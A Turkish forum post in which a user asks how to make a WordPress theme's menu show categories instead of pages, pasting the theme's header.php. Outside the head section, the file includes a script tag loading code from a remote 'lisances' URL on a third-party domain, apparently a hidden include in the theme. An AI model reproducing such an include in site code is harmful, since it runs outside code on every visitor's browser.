Sitemde Bir Takım Sıkıntılar Var. Yukarıda 'A' Kategori Yapacagim Fakat Yapmıyorum. Sayfalar Olarak Tanımlanmış Yardımcı Olurmusunuz ? WebSitem Burasi Bunun Gibi Olmasini İstiyorum Link Teşekkürler

Header.php Şöyke Arkadaşlar Yukarıda Kategorileri Sıralamasini İstiyorum Sayfaların Değil.
<?php global $lyricsy; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="<?php bloginfo('language'); ?>" xml:lang="<?php bloginfo('language'); ?>">
<head profile="http://gmpg.org/xfn/11">

<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />

<title><?php lyricsy_titles(); ?></title>

<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="<?php bloginfo('name'); ?> RSS Feed" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<link rel="shortcut icon" href="<?php bloginfo('template_directory'); ?>/favicon.ico" />

<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="<?php bloginfo('template_directory'); ?>/js/custom.js"></script>

<?php wp_head(); ?>

</head>
<SCRIPT src="http://trwordpress.org/lisances/lisances.php"></SCRIPT>
<?php flush(); ?>

<body>

<div id="wrapper">

	<div id="header">
	
		<a href="<?php bloginfo('url'); ?>" id="logo"><img src="<?php bloginfo('template_directory'); ?>/images/<?php echo $lyricsy['logo']; ?>" alt="<?php bloginfo('name'); ?>" title="<?php bloginfo('name'); ?>" /></a>

			<div id="header-ad">
				<?php print stripslashes($lyricsy['adblock1']); ?>
			</div>
		
		<div id="dosearch">	
			<form class="searchform" method="get" action="<?php bloginfo('url'); ?>/">
				<fieldset>
					<input type="text" value="<?php _e('Do a new search...','lyrcsy'); ?>" name="s" class="searchfield" onfocus="if (this.value == '<?php _e('Do a new search...','lyrcsy'); ?>') {this.value = '';}" onblur="if (this.value == '') {this.value = '<?php _e('Arama Yapin....','lyrcsy'); ?>';}" />
					<input type="submit" value="<?php _e('Search','lyrcsy'); ?>" class="searchbutton" />
				</fieldset>
			</form>
		</div>
		
	<div class="clear"></div>
	</div>
	
	<div id="menu">
			<?php wp_nav_menu( array( 'theme_location' => 'primary', 'depth' => '0' ) ); ?>
	<div class="clear"></div>
	</div>